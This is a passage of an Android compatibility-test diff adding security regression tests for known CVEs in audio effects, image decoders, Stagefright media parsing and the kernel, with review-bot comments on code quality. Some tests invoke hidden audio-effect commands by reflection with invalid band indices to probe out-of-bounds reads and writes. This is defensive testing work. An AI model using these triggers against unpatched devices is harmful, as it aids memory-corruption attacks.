+ }
+
+ // wait for track to really begin playing
+ Thread.sleep(200 /* millis */);
+
+ // create effect
+ {
+ audioEffect = (AudioEffect) AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type, descriptor.uuid, 0 /* priority */,
+ audioTrack.getAudioSessionId());
+ }
+
+ // set capture size
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(4) // psize (sizeof(param))
+ .putInt(4) // vsize (sizeof(value))
+ .putInt(VISUALIZER_PARAM_CAPTURE_SIZE) // data[0] (param)
+ .putInt(CAPTURE_SIZE) // data[4] (value)
+ .array();
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_SET_PARAM,
+ command, new byte[4] /* reply */);
+ Log.d(TAG, "setparam returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+
+ // enable effect
+ {
+ final int ret = audioEffect.setEnabled(true);
+ assertEquals("Cannot enable audio effect", 0 /* expected */, ret);
+ }
+
+ // wait for track audio data to be processed, otherwise capture
+ // will not really return audio data.
+ Thread.sleep(200 /* millis */);
+
+ // capture data
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ VISUALIZER_CMD_CAPTURE,
+ new byte[0] /* command */, captureBuf /* reply */);
+ Log.d(TAG, "capture returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } finally {
+ if (audioEffect != null) {
+ audioEffect.release();
+ }
+ if (audioTrack != null) {
+ audioTrack.release();
+ }
+ }
+ }
+ }
+}
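Review bot: `testAudioEffectGetParameter3` and `testAudioEffectSetOffload` are private and nothing in this file calls them, so the zero-length command and reply cases they build never run; either wire each through `testAllEffects` with a public test method, as the three existing tests do, or drop them. In `testAllEffects`, both catch blocks log the failure without the throwable, which leaves only a failure count in the report; `Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!", e);` keeps the cause. The helpers also treat a missing `command()` method as a pass (the `NoSuchMethodException` branch only logs a warning), so on such a build these tests would report success without sending anything to the effect; that looks deliberate but deserves a comment saying so.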
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+ /**
+ * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+ *
+ * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+ * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+ */
+ public void test_android_bug_33251605() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+ Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+ }
+}
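Review bot: The stream opened from `R.raw.bug_33251605` in `test_android_bug_33251605` is never closed, and the decode result goes into an unused local `bitmap`. The test has no assertion, so it passes whenever `decodeStream` returns, including when it returns null; a one-line comment stating that surviving the decode without an OutOfMemoryError is the whole check would make that explicit. Closing the stream is a small change: declare `throws Exception` and use `try (InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605)) { BitmapFactory.decodeStream(exploitImage); }`. The `import android.security.cts.R;` line is redundant, since the class is already in that package.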
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
new file mode 100644
index 0000000..c844fbb
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -0,0 +1,339 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.media.audiofx.AudioEffect;
+import android.media.audiofx.Equalizer;
+import android.media.MediaPlayer;
+import android.test.InstrumentationTestCase;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.nio.charset.StandardCharsets;
+import java.util.Arrays;
+
+public class EffectBundleTest extends InstrumentationTestCase {
+ private static final String TAG = "EffectBundleTest";
+ private static final int[] INVALID_BAND_ARRAY = {Integer.MIN_VALUE, -10000, -100, -2, -1};
+ private static final int mValue0 = 9999; //unlikely values. Should not change
+ private static final int mValue1 = 13877;
+ private static final int PRESET_CUSTOM = -1; //keep in sync AudioEqualizer.h
+
+ private static final int MEDIA_SHORT = 0;
+ private static final int MEDIA_LONG = 1;
+
+ //Testing security bug: 32436341
+ public void testEqualizer_getParamCenterFreq() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588352
+ public void testEqualizer_getParamCenterFreq_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_CENTER_FREQ, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32438598
+ public void testEqualizer_getParamBandLevel() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32584034
+ public void testEqualizer_getParamBandLevel_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_LEVEL, INVALID_BAND_ARRAY, mValue0, mValue1);
+ }
+
+ //Testing security bug: 32247948
+ public void testEqualizer_getParamFreqRange() throws Exception {
+ testGetParam(MEDIA_SHORT, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32588756
+ public void testEqualizer_getParamFreqRange_long() throws Exception {
+ testGetParam(MEDIA_LONG, Equalizer.PARAM_BAND_FREQ_RANGE, INVALID_BAND_ARRAY, mValue0,
+ mValue1);
+ }
+
+ //Testing security bug: 32448258
+ public void testEqualizer_getParamPresetName() throws Exception {
+ testParamPresetName(MEDIA_SHORT);
+ }
+
+ //Testing security bug: 32588016
+ public void testEqualizer_getParamPresetName_long() throws Exception {
+ testParamPresetName(MEDIA_LONG);
+ }
+
+ private void testParamPresetName(int media) {
+ final int command = Equalizer.PARAM_GET_PRESET_NAME;
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ final byte testValue = 7;
+ byte reply[] = new byte[Equalizer.PARAM_STRING_SIZE_MAX];
+ Arrays.fill(reply, testValue);
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail("getParam PARAM_GET_PRESET_NAME did not complete successfully");
+ }
+ //Compare
+ if (invalidBand == PRESET_CUSTOM) {
+ final String expectedName = "Custom";
+ int length = 0;
+ while (reply[length] != 0) length++;
+ try {
+ final String presetName = new String(reply, 0, length,
+ StandardCharsets.ISO_8859_1.name());
+ assertEquals("getPresetName custom preset name failed", expectedName,
+ presetName);
+ } catch (Exception e) {
+ Log.w(TAG,"Problem creating reply string.");
+ }
+ } else {
+ for (int i = 0; i < reply.length; i++) {
+ assertEquals(String.format("getParam should not change reply at byte %d", i),
+ testValue, reply[i]);
+ }
+ }
+ }
+ }
+
+ //testing security bug: 32095626
+ public void testEqualizer_setParamBandLevel() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_SHORT, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32585400
+ public void testEqualizer_setParamBandLevel_long() throws Exception {
+ final int command = Equalizer.PARAM_BAND_LEVEL;
+ short[] value = { 1000 };
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqSetParam(MEDIA_LONG, command, invalidBand, value)) {
+ fail("setParam PARAM_BAND_LEVEL did not complete successfully");
+ }
+ }
+ }
+
+ //testing security bug: 32705438
+ public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_short did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_SHORT));
+ }
+
+ //testing security bug: 32703959
+ public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
+ assertTrue("testEqualizer_getParamFreqRangeCommand_long did not complete successfully",
+ eqGetParamFreqRangeCommand(MEDIA_LONG));
+ }
+
+ private boolean eqGetParamFreqRangeCommand(int media) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ short band = 2;
+ int intSize = 4; //bytes
+
+ //baseline
+ int cmdCode = 8; // EFFECT_CMD_GET_PARAM
+ byte command[] = concatArrays(/*status*/ intToByteArray(0),
+ /*psize*/ intToByteArray(2 * intSize),
+ /*vsize*/ intToByteArray(2 * intSize),
+ /*data[0]*/ intToByteArray(Equalizer.PARAM_BAND_FREQ_RANGE),
+ /*data[1]*/ intToByteArray((int) band));
+
+ byte reply[] = new byte[command.length];
+
+ AudioEffect af = eq;
+ Object o = AudioEffect.class.getDeclaredMethod("command", int.class, byte[].class,
+ byte[].class).invoke(af, cmdCode, command, reply);
+
+ int methodStatus = AudioEffect.ERROR;
+ if (o != null) {
+ methodStatus = Integer.valueOf(o.toString()).intValue();
+ }
+
+ assertTrue("Command expected to fail", methodStatus <= 0);
+ int sum = 0;
+ for (int i = 0; i < reply.length; i++) {
+ sum += Math.abs(reply[i]);
+ }
+
+ assertEquals("reply expected to be all zeros", sum, 0);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing eqGetParamFreqRangeCommand");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, byte[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ byte[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem testing equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private boolean eqGetParam(int media, int command, int band, int[] reply) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("getParameter", int[].class,
+ int[].class).invoke(af, cmd, reply);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem getting parameter from equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private void testGetParam(int media, int command, int[] bandArray, int value0, int value1) {
+ int reply[] = {value0, value1};
+ for (int invalidBand : INVALID_BAND_ARRAY)
+ {
+ if (!eqGetParam(media, command, invalidBand, reply)) {
+ fail(String.format("getParam for command %d did not complete successfully",
+ command));
+ }
+ assertEquals("getParam should not change value0", value0, reply[0]);
+ assertEquals("getParam should not change value1", value1, reply[1]);
+ }
+ }
+
+ private boolean eqSetParam(int media, int command, int band, short[] value) {
+ MediaPlayer mp = null;
+ Equalizer eq = null;
+ boolean status = false;
+ try {
+ mp = MediaPlayer.create(getInstrumentation().getContext(), getMediaId(media));
+ eq = new Equalizer(0 /*priority*/, mp.getAudioSessionId());
+
+ AudioEffect af = eq;
+ int cmd[] = {command, band};
+
+ AudioEffect.class.getDeclaredMethod("setParameter", int[].class,
+ short[].class).invoke(af, cmd, value);
+ status = true;
+ } catch (Exception e) {
+ Log.w(TAG,"Problem setting parameter in equalizer");
+ status = false;
+ } finally {
+ if (eq != null) {
+ eq.release();
+ }
+ if (mp != null) {
+ mp.release();
+ }
+ }
+ return status;
+ }
+
+ private int getMediaId(int media) {
+ switch (media) {
+ default:
+ case MEDIA_SHORT:
+ return R.raw.good;
+ case MEDIA_LONG:
+ return R.raw.onekhzsine_90sec;
+ }
+ }
+
+ private static byte[] intToByteArray(int value) {
+ ByteBuffer converter = ByteBuffer.allocate(4);
+ converter.order(ByteOrder.nativeOrder());
+ converter.putInt(value);
+ return converter.array();
+ }
+
+ private static byte[] shortToByteArray(short value) {
+ ByteBuffer converter = ByteBuffer.allocate(2);
+ converter.order(ByteOrder.nativeOrder());
+ short sValue = (short) value;
+ converter.putShort(sValue);
+ return converter.array();
+ }
+
+ private static byte[] concatArrays(byte[]... arrays) {
+ int len = 0;
+ for (byte[] a : arrays) {
+ len += a.length;
+ }
+ byte[] b = new byte[len];
+
+ int offs = 0;
+ for (byte[] a : arrays) {
+ System.arraycopy(a, 0, b, offs, a.length);
+ offs += a.length;
+ }
+ return b;
+ }
+}
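Review bot: `testGetParam` never reads its `bandArray` parameter; the loop iterates the constant `INVALID_BAND_ARRAY`, so a future caller passing a different array would silently test the constant instead. Use `for (int invalidBand : bandArray)`. In `eqGetParamFreqRangeCommand`, `assertEquals("reply expected to be all zeros", sum, 0)` has expected and actual swapped, which gives a misleading failure message; it should read `assertEquals("reply expected to be all zeros", 0, sum)`. The `eq*` helpers catch `Exception` and log without the throwable, so a reflection failure and an effect error look the same in the log; passing `e` as the third argument to `Log.w` would separate them. `shortToByteArray` is not called anywhere in this file.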
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+ /**
+ * Verifies that decoding a particular GIF file does not read out out of bounds.
+ *
+ * The image has a color map of size 2, but states that pixels should come from values
+ * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+ * color map, which would be reading memory that we do not control, and may be uninitialized.
+ */
+ public void test_android_bug_33897722() {
+ InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+ Movie movie = Movie.decodeStream(exploitImage);
+ assertNotNull(movie);
+ assertEquals(movie.width(), 600);
+ assertEquals(movie.height(), 752);
+
+ // The image has a 10 x 10 frame on top of a transparent background. Only test the
+ // 10 x 10 frame, since the original bug would never have used uninitialized memory
+ // outside of it.
+ Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+ Canvas canvas = new Canvas(bitmap);
+
+ // Use Src PorterDuff mode, to see exactly what the Movie creates.
+ Paint paint = new Paint();
+ paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+ movie.draw(canvas, 0, 0, paint);
+
+ for (int x = 0; x < 10; x++) {
+ for (int y = 0; y < 10; y++) {
+ assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+ }
+ }
+ }
+}
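Review bot: The three `assertEquals` calls in `test_android_bug_33897722` pass the actual value first and the expected value second, so a failure would report the numbers the wrong way round; write `assertEquals(600, movie.width());`, `assertEquals(752, movie.height());` and `assertEquals(Color.TRANSPARENT, bitmap.getPixel(x, y));`. The Javadoc reads "read out out of bounds"; it should be "read out of bounds". The raw-resource stream is not closed after `Movie.decodeStream`.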
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+
import junit.framework.TestCase;
public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
System.loadLibrary("ctssecurity_jni");
}
+ @SecurityTest
public void testVroot() throws Exception {
assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
+ "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
+ "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
}
+ @SecurityTest
public void testPerfEvent() throws Exception {
assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
+ "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
doPerfEventTest());
}
+ @SecurityTest
public void testPerfEvent2() throws Exception {
assertTrue(doPerfEventTest2());
}
+ @SecurityTest
public void testFutex() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
+ "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
doFutexTest());
}
+ @SecurityTest
public void testNvmapIocFromId() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-5332. "
+ "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
doNvmapIocFromIdTest());
}
+ @SecurityTest
public void testPingPongRoot() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
+ "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
doPingPongRootTest());
}
+ @SecurityTest
public void testPipeReadV() throws Exception {
assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
+ " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
doPipeReadVTest());
}
+ @SecurityTest
public void testSysVipc() throws Exception {
assertTrue("Android does not support Sys V IPC, it must "
+ "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
*/
private static native boolean doVrootTest();
+ @SecurityTest
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 8f4b5d9..53c0e0a 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -33,16 +33,19 @@
import android.media.MediaCodecList;
import android.media.MediaExtractor;
import android.media.MediaFormat;
+import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
import android.opengl.GLES20;
import android.opengl.GLES11Ext;
import android.os.Looper;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
import android.util.Log;
import android.view.Surface;
import java.io.IOException;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
@@ -62,114 +65,197 @@
public StagefrightTest() {
}
+ /***********************************************************
+ to prevent merge conflicts, add K tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33137046() throws Exception {
+ doStagefrightTest(R.raw.bug_33137046);
+ }
+
+ @SecurityTest
+ public void testStagefright_cve_2016_2507() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2507);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_31647370() throws Exception {
+ doStagefrightTest(R.raw.bug_31647370);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32577290() throws Exception {
+ doStagefrightTest(R.raw.bug_32577290);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
+ @SecurityTest
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
+ @SecurityTest
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
+ @SecurityTest
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
+ @SecurityTest
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
+ @SecurityTest
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
+ @SecurityTest
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
+ @SecurityTest
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
+ @SecurityTest
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
+ @SecurityTest
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
+ @SecurityTest
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
+ @SecurityTest
+ public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
+ }
+
+ /***********************************************************
+ to prevent merge conflicts, add M tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testStagefright_bug_33818508() throws Exception {
+ doStagefrightTest(R.raw.bug_33818508);
+ }
+
+ @SecurityTest
+ public void testStagefright_bug_32873375() throws Exception {
+ doStagefrightTest(R.raw.bug_32873375);
+ }
+
+ @SecurityTest
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
+ @SecurityTest
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
+ @SecurityTest
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
+ @SecurityTest
+ public void testStagefright_bug_32322258() throws Exception {
+ doStagefrightTest(R.raw.bug_32322258);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
+ @SecurityTest
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
+ @SecurityTest
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
+ @SecurityTest
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
+ @SecurityTest
+ public void testStagefright_bug_32915871() throws Exception {
+ doStagefrightTest(R.raw.bug_32915871);
+ }
+
+ @SecurityTest
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
+ @SecurityTest
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
+ @SecurityTest
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
+ @SecurityTest
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
+ @SecurityTest
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
@@ -177,6 +263,7 @@
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
+ doStagefrightTestMediaMetadataRetriever(rid);
}
private Surface getDummySurface() {
@@ -282,7 +369,6 @@
final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
-
LooperThread t = new LooperThread(new Runnable() {
@Override
public void run() {
@@ -363,7 +449,6 @@
} catch (IOException e) {
// ignore
}
- MediaCodecList codecList = new MediaCodecList(MediaCodecList.REGULAR_CODECS);
int numtracks = ex.getTrackCount();
String rname = resources.getResourceEntryName(rid);
Log.i(TAG, "start mediacodec test for: " + rname + ", which has " + numtracks + " tracks");
@@ -378,13 +463,15 @@
continue;
}
String mime = format.getString(MediaFormat.KEY_MIME);
- for (MediaCodecInfo info: codecList.getCodecInfos()) {
+ int numCodecs = MediaCodecList.getCodecCount();
+ for (int i = 0; i < numCodecs; i++) {
+ MediaCodecInfo info = MediaCodecList.getCodecInfoAt(i);
if (info.isEncoder()) {
continue;
}
try {
MediaCodecInfo.CodecCapabilities caps = info.getCapabilitiesForType(mime);
- if (caps != null && caps.isFormatSupported(format)) {
+ if (caps != null) {
matchingCodecs.add(info.getName());
}
} catch (IllegalArgumentException e) {
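Review bot: The switch to `MediaCodecList.getCodecCount()` / `getCodecInfoAt(i)` and the dropped `caps.isFormatSupported(format)` check are not explained in the loop, and both read like regressions to anyone used to the instance API. The static calls are the deprecated pre-API-21 form, presumably chosen so the same test source builds on the older branches this merge passes through. The looser `caps != null` test means every decoder advertising the MIME type now receives the malformed stream. A comment above the loop would record that, e.g. `// Static MediaCodecList API so this builds on older branches; try every decoder for the MIME type, even one that rejects the format`. The enclosing method starts and ends outside this hunk.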
@@ -405,16 +492,21 @@
if (mime.startsWith("video/")) {
surface = getDummySurface();
}
- codec.configure(format, surface, null, 0);
- codec.start();
+ try {
+ codec.configure(format, surface, null, 0);
+ codec.start();
+ } catch (Exception e) {
+ Log.i(TAG, "Failed to start/configure:", e);
+ }
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
+ ByteBuffer [] inputBuffers = codec.getInputBuffers();
while (true) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
int bufidx = codec.dequeueInputBuffer(5000);
if (bufidx >= 0) {
- int n = ex.readSampleData(codec.getInputBuffer(bufidx), 0);
+ int n = ex.readSampleData(inputBuffers[bufidx], 0);
if (n < 0) {
flags = MediaCodec.BUFFER_FLAG_END_OF_STREAM;
time = 0;
@@ -435,14 +527,8 @@
codec.releaseOutputBuffer(status, true);
}
}
- } catch (MediaCodec.CodecException ce) {
- if (ce.getErrorCode() == MediaCodec.CodecException.ERROR_RECLAIMED) {
- // This indicates that the remote service is dead, suggesting a crash.
- throw new RuntimeException(ce);
- }
- // Other errors ignored.
- } catch (IllegalStateException ise) {
- // Other errors ignored.
+ } catch (Exception e) {
+ // local exceptions ignored, not security issues
} finally {
codec.release();
}
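Review bot: `catch (Exception e)` swallows every failure in the decode loop, so this MediaCodec path can no longer fail the test on its own. The verdict now rests entirely on the MediaPlayer error listener (`mpcl.waitForError()`), which appears only as context in the following hunk. Because the handler is empty, a run where the codec never started (the previous hunk logs and continues after a failed `configure`/`start`) is indistinguishable from one that decoded the whole file. Logging the exception keeps that evidence in the test output: `Log.i(TAG, "codec exception ignored", e);`. The enclosing method begins outside this hunk.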
@@ -453,6 +539,62 @@
assertFalse("Device *IS* vulnerable to " + cve,
mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
thr.stopLooper();
+ thr.join();
+ }
+ private void doStagefrightTestMediaMetadataRetriever(final int rid) throws Exception {
